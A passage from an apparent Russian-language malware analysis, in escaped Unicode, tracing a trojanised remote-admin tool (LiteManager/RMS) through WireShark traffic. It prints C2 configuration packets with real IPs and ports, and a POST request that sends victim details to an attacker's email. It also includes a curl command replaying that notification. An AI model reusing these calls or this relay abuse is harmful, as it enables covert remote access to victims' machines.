  \u0420\u0430\u0441\u043f\u0430\u043a\u043e\u0432\u044b\u0432\u0430\u044e \u0434\u0438\u0441\u0442\u0440\u0438\u0431\u0443\u0442\u0438\u0432 \u0438 \u0432\u044b\u0442\u0430\u0441\u043a\u0438\u0432\u0430\u044e \u0438\u0437 \u043d\u0435\u0433\u043e \u0444\u0430\u0439\u043b \u0441\u0435\u0440\u0432\u0435\u0440\u0430: romserver.exe. \u041e\u0442\u043a\u0440\u044b\u0432\u0430\u044e \u043e\u043a\u043e\u0448\u043a\u043e \u0441 \u0435\u0433\u043e \u0441\u0432\u043e\u0439\u0441\u0442\u0432\u0430\u043c\u0438:
  <\/p>\n
  \u0414\u0430, \u043e\u0447\u0435\u043d\u044c \u043f\u043e\u0445\u043e\u0436\u0435: \u0442\u0430 \u0436\u0435 \u0438\u043a\u043e\u043d\u043a\u0430, \u0442\u0435 \u0436\u0435 \u0432\u0435\u0440\u0441\u0438\u0438, \u0442\u043e\u043b\u044c\u043a\u043e \u0441\u0430\u043c\u0443\u044e \u043c\u0430\u043b\u043e\u0441\u0442\u044c \u043e\u0442\u043b\u0438\u0447\u0430\u0435\u0442\u0441\u044f \u0440\u0430\u0437\u043c\u0435\u0440 \u0438 \u0435\u0441\u0442\u044c \u0446\u0438\u0444\u0440\u043e\u0432\u0430\u044f \u043f\u043e\u0434\u043f\u0438\u0441\u044c. \u041e\u0447\u0435\u0432\u0438\u0434\u043d\u043e, \u0447\u0442\u043e \u0444\u0430\u0439\u043b \u00ab\u0434\u043e\u0440\u0430\u0431\u043e\u0442\u0430\u043b\u0438 \u043d\u0430\u043f\u0438\u043b\u044c\u043d\u0438\u043a\u043e\u043c\u00bb, \u043f\u043e\u0442\u043e\u043c\u0443 \u0447\u0442\u043e \u0432 \u0438\u0441\u0445\u043e\u0434\u043d\u043e\u043c \u0432\u0438\u0434\u0435 \u043e\u043d \u043d\u0435 \u0441\u043e\u0432\u0441\u0435\u043c \u0443\u0441\u0442\u0440\u0430\u0438\u0432\u0430\u043b \u0437\u043b\u043e\u0434\u0435\u0435\u0432. \u041c\u043e\u0436\u0435\u0442 \u0431\u044b\u0442\u044c \u043a\u0430\u043a-\u043d\u0438\u0431\u0443\u0434\u044c \u0432\u044b\u0434\u0430\u0432\u0430\u043b \u0441\u0432\u043e\u0451 \u043f\u0440\u0438\u0441\u0443\u0442\u0441\u0442\u0432\u0438\u0435 \u0432 \u0441\u0438\u0441\u0442\u0435\u043c\u0435 \u2014 \u0447\u0442\u043e \u0431\u044b\u043b\u043e \u0441\u043e\u0432\u0441\u0435\u043c \u043b\u0438\u0448\u043d\u0438\u043c. \u041e\u0434\u043d\u0430\u043a\u043e \u0442\u043e, \u0447\u0442\u043e \u0444\u0430\u0439\u043b \u0431\u044b\u043b \u0438\u0437\u043c\u0435\u043d\u0451\u043d, \u0441\u043e\u0432\u0435\u0440\u0448\u0435\u043d\u043d\u043e \u043d\u0435 \u043d\u0430\u043f\u0440\u044f\u0433\u0430\u0435\u0442 \u0430\u043d\u0442\u0438\u0432\u0438\u0440\u0443\u0441\u044b: \u043d\u0430 Virustotal-\u0435 \u0431\u043e\u043b\u044c\u0448\u0438\u043d\u0441\u0442\u0432\u043e \u0438\u0437 \u043d\u0438\u0445 \u043f\u0440\u043e\u0441\u0442\u043e \u043c\u043e\u043b\u0447\u0438\u0442 \u0438 \u043b\u0438\u0448\u044c \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u0441\u043e\u043e\u0431\u0449\u0430\u044e\u0442, \u0447\u0442\u043e \u044d\u0442\u043e \u043f\u0440\u043e\u0441\u0442\u043e RiskWare.<\/p>\n
  \u041f\u0440\u043e\u0434\u043e\u043b\u0436\u0438\u043c. \u0422\u0435\u043f\u0435\u0440\u044c \u044f \u0431\u0443\u0434\u0443 \u0438\u0437\u0443\u0447\u0430\u0442\u044c \u043b\u043e\u0433 WireShark.<\/p>\n
  \u041f\u0435\u0440\u0432\u044b\u043c \u0434\u0435\u043b\u043e\u043c ctfmon.exe \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0435\u0442 \u0441\u043e\u0435\u0434\u0438\u043d\u0435\u043d\u0438\u0435 \u0441 \u0430\u0434\u0440\u0435\u0441\u043e\u043c 91.240.86.200. \u041f\u043e \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043b\u0435\u043d\u043d\u043e\u043c\u0443 \u043a\u0430\u043d\u0430\u043b\u0443 \u0432\u0437\u0430\u0434-\u0432\u043f\u0435\u0440\u0451\u0434 \u0431\u0435\u0433\u0430\u0435\u0442 \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u043a\u043e\u0440\u043e\u0442\u043a\u0438\u0445 \u0441\u043e\u043e\u0431\u0449\u0435\u043d\u0438\u0439, \u0441\u043b\u0435\u0434\u043e\u043c \u0437\u0430 \u043a\u043e\u0442\u043e\u0440\u044b\u043c\u0438 ctfmon.exe \u043f\u043e\u043b\u0443\u0447\u0430\u0435\u0442 \u0432\u043e\u0442 \u0442\u0430\u043a\u043e\u0439 \u043f\u0430\u043a\u0435\u0442:  <\/p>\n
<?xml version="1.0" encoding="UTF-16"?> <rom_sever_client_settings version="4722">  <id>180185<\/id>  <internal_id>9017511<\/internal_id>  <noip_number>-1<\/noip_number>  <license>false<\/license>  <host><\/host>  <port>5650<\/port>  <redirected>false<\/redirected>  <server_ver>4722<\/server_ver>  <remotehideserverresub>false<\/remotehideserverresub>  <connectid>1195251490<\/connectid>  <protect_code>0<\/protect_code> <\/rom_sever_client_settings> <\/code><\/pre>\n
  \u041f\u043e\u0445\u043e\u0436\u0435 \u043d\u0430 \u0440\u0435\u0433\u0438\u0441\u0442\u0440\u0430\u0446\u0438\u044e \u043d\u0430 \u043e\u0434\u043d\u043e\u043c \u0438\u0437 \u0433\u043e\u043b\u043e\u0432\u043d\u044b\u0445 \u0441\u0435\u0440\u0432\u0435\u0440\u043e\u0432 LiteManager.
  \u0417\u0430\u0442\u0435\u043c \u043d\u0435\u043a\u043e\u0442\u043e\u0440\u043e\u0435 \u0432\u0440\u0435\u043c\u044f \u043e\u043f\u044f\u0442\u044c \u0438\u0434\u0451\u0442 \u043e\u0431\u043c\u0435\u043d \u043a\u043e\u0440\u043e\u0442\u043a\u0438\u043c\u0438 \u0441\u043e\u043e\u0431\u0449\u0435\u043d\u0438\u044f\u043c\u0438, \u0437\u0430 \u043a\u043e\u0442\u043e\u0440\u044b\u043c\u0438 \u043f\u0440\u0438\u0445\u043e\u0434\u0438\u0442 \u0435\u0449\u0451 \u043e\u0434\u0438\u043d \u043f\u0430\u043a\u0435\u0442:  <\/p>\n
<?xml version="1.0" encoding="UTF-16"?> <rom_noip_client_settings version="4725">  <host>83.240.218.170<\/host>  <port>5651<\/port>  <max_connections>30<\/max_connections>  <cur_connections>0<\/cur_connections>  <ip_filter>false<\/ip_filter>  <id_filter>false<\/id_filter>  <mac_filter>false<\/mac_filter>  <caption><\/caption>  <description><\/description>  <no_ip_type>1<\/no_ip_type>  <license>1<\/license>  <number>409<\/number>  <internalID>2801665<\/internalID>  <NoIPSelf>false<\/NoIPSelf>  <ver>4724<\/ver> <\/rom_noip_client_settings> <\/code><\/pre>\n
  \u042d\u0442\u043e \u0443\u0436\u0435 \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u0435\u0439. \u0414\u0435\u043b\u043e \u0432 \u0442\u043e\u043c, \u0447\u0442\u043e \u043a\u043b\u0438\u0435\u043d\u0442 LiteManager \u043c\u043e\u0436\u0435\u0442 \u0441\u043e\u0435\u0434\u0438\u043d\u044f\u0442\u044c\u0441\u044f \u0441 \u0441\u0435\u0440\u0432\u0435\u0440\u043e\u043c \u043d\u0435 \u043d\u0430\u043f\u0440\u044f\u043c\u0443\u044e, \u0430 \u0447\u0435\u0440\u0435\u0437 \u0442\u0440\u0435\u0442\u0438\u0439 \u0443\u0437\u0435\u043b \u2014 \u0442\u0430\u043a \u043d\u0430\u0437\u044b\u0432\u0430\u0435\u043c\u044b\u0439 NoIPServer<\/a>. \u041d\u0435\u043e\u0431\u0445\u043e\u0434\u0438\u043c\u043e\u0441\u0442\u044c \u0432 \u044d\u0442\u043e\u043c \u043c\u043e\u0436\u0435\u0442 \u0432\u043e\u0437\u043d\u0438\u043a\u043d\u0443\u0442\u044c \u0432 \u0441\u043b\u0443\u0447\u0430\u0435, \u0435\u0441\u043b\u0438 \u0441\u0435\u0440\u0432\u0435\u0440 \u0441\u043f\u0440\u044f\u0442\u0430\u043d \u043e\u0442 \u0418\u043d\u0442\u0435\u0440\u043d\u0435\u0442\u0430 \u0437\u0430 \u043a\u0430\u043a\u0438\u043c\u0438-\u043d\u0438\u0431\u0443\u0434\u044c \u0444\u0430\u0435\u0440\u0432\u043e\u043b\u0430\u043c\u0438\/\u043d\u0430\u0442\u0430\u043c\u0438 \u0438 \u0442.\u043f. \u0414\u043b\u044f \u0437\u043b\u043e\u0434\u0435\u0435\u0432 \u0436\u0435 \u043d\u0430\u043b\u0438\u0447\u0438\u0435 \u043f\u043e\u0434\u043e\u0431\u043d\u043e\u0433\u043e \u0442\u0440\u0435\u0442\u044c\u0435\u0433\u043e \u0443\u0437\u043b\u0430 \u2014 \u043f\u0440\u0435\u043a\u0440\u0430\u0441\u043d\u044b\u0439 \u0441\u043f\u043e\u0441\u043e\u0431 \u0430\u043d\u043e\u043d\u0438\u043c\u0438\u0437\u0438\u0440\u043e\u0432\u0430\u0442\u044c\u0441\u044f \u2014 \u0441\u043a\u0440\u044b\u0442\u044c \u0441\u0432\u043e\u0439 \u043a\u043b\u0438\u0435\u043d\u0442\u0441\u043a\u0438\u0439 IP \u043e\u0442 \u043f\u043e\u0441\u0442\u043e\u0440\u043e\u043d\u043d\u0438\u0445 \u0433\u043b\u0430\u0437. \u0414\u0430\u043d\u043d\u044b\u0439 \u043f\u0430\u043a\u0435\u0442 \u043a\u0430\u043a \u0440\u0430\u0437 \u0441\u043e\u0434\u0435\u0440\u0436\u0438\u0442 \u0443\u043a\u0430\u0437\u0430\u043d\u0438\u044f \u0441\u0435\u0440\u0432\u0435\u0440\u0443 \u2014 \u0447\u0435\u0440\u0435\u0437 \u0447\u0442\u043e \u0440\u0430\u0431\u043e\u0442\u0430\u0442\u044c \u0434\u0430\u043b\u044c\u0448\u0435 (\u0430\u0434\u0440\u0435\u0441 \u0438 \u043f\u043e\u0440\u0442 NoIPServer-\u0430).<\/p>\n
  \u0421\u043c\u043e\u0442\u0440\u0438\u043c \u0434\u0430\u043b\u044c\u0448\u0435. \u0422\u0443\u0442 \u043d\u0430\u0447\u0438\u043d\u0430\u0435\u0442\u0441\u044f \u0441\u0430\u043c\u043e\u0435 \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u043e\u0435! \u0421\u0440\u0430\u0437\u0443 \u043f\u043e\u0441\u043b\u0435 \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u044f \u044d\u0442\u043e\u0433\u043e \u043f\u0430\u043a\u0435\u0442\u0430 ctfmon.exe \u043e\u0442\u043f\u0440\u0430\u0432\u043b\u044f\u0435\u0442 \u043f\u043e \u0430\u0434\u0440\u0435\u0441\u0443 htt\u0440:\/\/rmansys.ru\/utils\/inet_id_notify.php \u0432\u043e\u0442 \u0442\u0430\u043a\u043e\u0439 POST-\u0437\u0430\u043f\u0440\u043e\u0441:
  ----------162747236742480
  Content-Disposition: form-data; name="email"
  Content-Type: text\/html; charset="UTF-8"
  Content-Transfer-Encoding: binary<\/p>\n
  blackcc019@gmail.com
  ----------162747236742480
  Content-Disposition: form-data; name="user_name"
  Content-Type: text\/html; charset="UTF-8"
  Content-Transfer-Encoding: binary<\/p>\n
  Dima
  ----------162747236742480
  Content-Disposition: form-data; name="comp_name"
  Content-Type: text\/html; charset="UTF-8"
  Content-Transfer-Encoding: binary<\/p>\n
  DIMA-\u041f\u041a
  ----------162747236742480
  Content-Disposition: form-data; name="id"
  Content-Type: text\/html; charset="UTF-8"
  Content-Transfer-Encoding: binary<\/p>\n
  180185
  ----------162747236742480
  Content-Disposition: form-data; name="lang_id"
  Content-Type: text\/html; charset="UTF-8"
  Content-Transfer-Encoding: binary<\/p>\n
  1049
  ----------162747236742480
  Content-Disposition: form-data; name="product"
  Content-Type: text\/html; charset="UTF-8"
  Content-Transfer-Encoding: binary<\/p>\n
  RMS
  ----------162747236742480--
  <\/code>
  \u041d\u0430 \u0447\u0442\u043e \u044d\u0442\u043e \u043f\u043e\u0445\u043e\u0436\u0435? \u042d\u0442\u043e \u043f\u043e\u0445\u043e\u0436\u0435 \u043d\u0430 \u0442\u043e, \u0447\u0442\u043e ctfmon \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u0441\u043a\u0440\u0438\u043f\u0442\u0430 inet_id_notify.php \u043f\u0435\u0440\u0435\u0434\u0430\u0451\u0442 \u043d\u0430 email \u0445\u043e\u0437\u044f\u0438\u043d\u0430 blackcc019@gmail.com \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044e \u043e \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u0430\u0445 \u043f\u043e\u0434\u043a\u043b\u044e\u0447\u0435\u043d\u0438\u044f \u043a \u0438\u043d\u0444\u0438\u0446\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u043c\u0443 \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0443.<\/p>\n
  \u0414\u043b\u044f \u043f\u0440\u043e\u0432\u0435\u0440\u043a\u0438 \u044d\u0442\u043e\u0439 \u0433\u0438\u043f\u043e\u0442\u0435\u0437\u044b \u044f \u043e\u0442\u043f\u0440\u0430\u0432\u0438\u043b \u043f\u043e\u0434\u043e\u0431\u043d\u044b\u0439 \u0437\u0430\u043f\u0440\u043e\u0441 \u0441\u043e \u0441\u0432\u043e\u0435\u0433\u043e Debian-\u0441\u0435\u0440\u0432\u0435\u0440\u0430:  <\/p>\n
curl --data "email=\u043c\u043e\u0439_\u044f\u0449\u0438\u043a&user_name=user1&comp_name=pc1&id=12345&lang_id=1049&product=RMS" http:\/\/rmansys.ru\/utils\/inet_id_notify.php <\/code><\/pre>\n
  \u041f\u0440\u043e\u0432\u0435\u0440\u044f\u044e \u043f\u043e\u0447\u0442\u0443 \u2014 \u0432\u0443\u0430\u043b\u044f!
  \u041f\u043e\u043b\u0443\u0447\u0435\u043d\u043e \u043f\u0438\u0441\u044c\u043c\u043e \u0441 \u0430\u0434\u0440\u0435\u0441\u0430 ‘TektonIT Corp. <info@tektonit.com>’
  \u0422\u0435\u043c\u0430 \u043f\u0438\u0441\u044c\u043c\u0430: ‘Remote Manipulator System \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043b\u0435\u043d \u043d\u0430 \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u043c \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0435, \u043d\u043e\u0432\u044b\u0439 Internet-ID \u043f\u043e\u043b\u0443\u0447\u0435\u043d: 12345’
  \u0422\u0435\u043a\u0441\u0442 \u043f\u0438\u0441\u044c\u043c\u0430:
  \u0414\u043e\u0431\u0440\u044b\u0439 \u0434\u0435\u043d\u044c.<\/p>\n
  \u0421\u043e\u043e\u0431\u0449\u0430\u0435\u043c, \u0447\u0442\u043e \u043d\u0430 \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u043c \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0435 \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043b\u0435\u043d \u0438 \u0437\u0430\u043f\u0443\u0449\u0435\u043d Remote Manipulator System, \u0441\u0433\u0435\u043d\u0435\u0440\u0438\u0440\u043e\u0432\u0430\u043d \u043d\u043e\u0432\u044b\u0439 \u0438\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u0440 "Internet-ID".<\/p>\n
  ID: 12345<\/p>\n
  \u0418\u043c\u044f \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f: user1
  \u041d\u0430\u0437\u0432\u0430\u043d\u0438\u0435 \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0430: pc1<\/p>\n
  \u0414\u0430\u043d\u043d\u043e\u0435 \u043f\u0438\u0441\u044c\u043c\u043e \u0441\u0433\u0435\u043d\u0435\u0440\u0438\u0440\u043e\u0432\u0430\u043d\u043e \u0430\u0432\u0442\u043e\u043c\u0430\u0442\u0438\u0447\u0435\u0441\u043a\u0438 \u0438 \u043d\u0435 \u0442\u0440\u0435\u0431\u0443\u0435\u0442 \u043e\u0442\u0432\u0435\u0442\u0430.
  \u0412\u043d\u0438\u043c\u0430\u043d\u0438\u0435! \u0421\u043e\u0445\u0440\u0430\u043d\u0438\u0442\u0435 \u0434\u0430\u043d\u043d\u043e\u0435 \u043f\u0438\u0441\u044c\u043c\u043e \u0432 \u043d\u0430\u0434\u0435\u0436\u043d\u043e\u043c \u043c\u0435\u0441\u0442\u0435 \u0438\u043b\u0438 \u0443\u0434\u0430\u043b\u0438\u0442\u0435, \u0442.\u043a. \u043e\u043d\u043e \u043c\u043e\u0436\u0435\u0442 \u0441\u043e\u0434\u0435\u0440\u0436\u0430\u0442\u044c \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044e, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0443\u044e \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u044b\u0439 \u0434\u043e\u0441\u0442\u0443\u043f \u043a \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0443.<\/p>\n
  \u0421\u0430\u0439\u0442: http:\/\/rmansys.ru\/
  \u0421\u043b\u0443\u0436\u0431\u0430 \u043f\u043e\u0434\u0434\u0435\u0440\u0436\u043a\u0438: support@tektonit.com
  TektonIT Corp.
  <\/code>
  \u0412\u0441\u0451 \u043f\u043e\u043d\u044f\u0442\u043d\u043e. \u0413\u043e\u0441\u043f\u043e\u0434\u0430 \u0441 rmansys.ru \u043f\u0440\u0435\u0434\u043e\u0441\u0442\u0430\u0432\u0438\u043b\u0438 \u0445\u0430\u043a\u0435\u0440\u0430\u043c \u043e\u0442\u043b\u0438\u0447\u043d\u0443\u044e \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u044c \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u043d\u0443\u0436\u043d\u0443\u044e \u0438\u043c \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044e \u0447\u0435\u0440\u0435\u0437 \u0442\u0430\u043a\u043e\u0439 \u0432\u043e\u0442 \u0441\u0432\u043e\u0435\u043e\u0431\u0440\u0430\u0437\u043d\u044b\u0439 \u043e\u0442\u043a\u0440\u044b\u0442\u044b\u0439 \u043f\u043e\u0447\u0442\u043e\u0432\u044b\u0439 \u0440\u0435\u043b\u0435\u0439. \u041c\u043e\u043b\u043e\u0434\u0446\u044b, \u043d\u0438\u0447\u0435\u0433\u043e \u043d\u0435 \u0441\u043a\u0430\u0436\u0435\u0448\u044c.<\/p>\n
  \u0417\u0430\u0442\u0435\u043c ctfmon.exe, \u043a\u0430\u043a \u0435\u043c\u0443 \u0431\u044b\u043b\u043e \u0438 \u0443\u043a\u0430\u0437\u0430\u043d\u043e, \u0441\u043e\u0435\u0434\u0438\u043d\u044f\u0435\u0442\u0441\u044f \u0441 \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u043e\u043c \u043f\u043e \u0430\u0434\u0440\u0435\u0441\u0443 83.240.218.170:5651 \u0438 \u0432\u0440\u0435\u043c\u044f \u043e\u0442 \u0432\u0440\u0435\u043c\u0435\u043d\u0438 \u043e\u0431\u043c\u0435\u043d\u0438\u0432\u0430\u0435\u0442\u0441\u044f \u0441 \u043d\u0438\u043c \u043a\u043e\u0440\u043e\u0442\u043a\u0438\u043c\u0438 \u0441\u043e\u043e\u0431\u0449\u0435\u043d\u0438\u044f\u043c\u0438 \u2014 \u0436\u0434\u0451\u0442 \u0432\u0445\u043e\u0434\u0430 \u0445\u043e\u0437\u044f\u0438\u043d\u0430.<\/p>\n
  \u041d\u0430\u0431\u043b\u044e\u0434\u0430\u0442\u044c \u0434\u0430\u043b\u044c\u0448\u0435 \u0441\u043c\u044b\u0441\u043b\u0430 \u043e\u0441\u043e\u0431\u043e\u0433\u043e \u043d\u0435 \u0431\u044b\u043b\u043e: \u0430\u043b\u0433\u043e\u0440\u0438\u0442\u043c \u043f\u043e\u0432\u0435\u0434\u0435\u043d\u0438\u044f \u043f\u043e\u043d\u044f\u0442\u0435\u043d.<\/p>\n
\u0427\u0430\u0441\u0442\u044c \u043f\u044f\u0442\u0430\u044f: \u043b\u0435\u0447\u0435\u043d\u0438\u0435<\/h2>\n
  \u0423\u0434\u0430\u043b\u0438\u0442\u044c \u044d\u0442\u0443 \u0438\u043d\u0444\u0435\u043a\u0446\u0438\u044e \u0432\u0435\u0441\u044c\u043c\u0430 \u043d\u0435 \u0441\u043b\u043e\u0436\u043d\u043e (\u0435\u0441\u043b\u0438, \u043a\u043e\u043d\u0435\u0447\u043d\u043e, \u0432\u0430\u043c \u0432 \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440 \u043d\u0435 \u0443\u0441\u043f\u0435\u043b\u0438 \u0443\u0434\u0430\u043b\u0451\u043d\u043d\u043e \u043d\u0430\u0441\u043e\u0432\u0430\u0442\u044c \u0435\u0449\u0451 \u043a\u0430\u043a\u043e\u0439-\u043d\u0438\u0431\u0443\u0434\u044c \u0432\u0438\u0440\u0443\u0441\u043d\u0438). \u041d\u0443\u0436\u043d\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u044c \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u0435 \u0448\u0430\u0433\u0438:<\/p>\n